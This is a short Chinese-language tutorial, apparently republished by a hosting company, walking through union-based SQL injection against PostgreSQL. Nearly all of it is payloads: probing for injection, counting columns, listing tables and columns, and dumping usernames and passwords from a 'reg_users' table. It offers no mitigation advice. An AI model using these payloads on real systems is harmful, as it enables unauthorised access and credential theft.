本篇内容主要讲解“postgreasql数据库注入的过程”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“postgreasql数据库注入的过程”吧!
成都创新互联公司-云计算及IDC服务提供商,涵盖公有云、IDC机房租用、雅安电信机房、等保安全、私有云建设等企业级互联网基础服务,沟通电话:13518219792
一、判断是否存在注入
and 1=2 返回错误
and 1=1 返回正常,存在注入
and 1::int=1 返回正常说明是postgresql数据库
二、判断字段数量
order by 5 返回错误
order by 4 返回正常说明,有四列
三、联合查询
union select '1','2','3','4' 可以看出2/3号位置显示
四、获取当前数据库
union select '1',current_database(),'3','4'
五、获取第一个表
union select '1',relname,'3','4' from pg_stat_user_tables limit 1 offset 0
获取第二个表
union select '1',relname,relname,'4' from pg_stat_user_tables limit 1 offset 1
六、获取第一个字段
union select '1',column_name,'3','4' from information_schema.columns where table_name='reg_users' limit 1 offset 0
获取第二个字段
union select '1',column_name,'3','4' from information_schema.columns where table_name='reg_users' limit 1 offset 1
七、获取字段内容
union select '1',''||name||','||password||'','3','4' from reg_users
到此,相信大家对“postgreasql数据库注入的过程”有了更深的了解,不妨来实际操作一番吧!这里是创新互联网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!
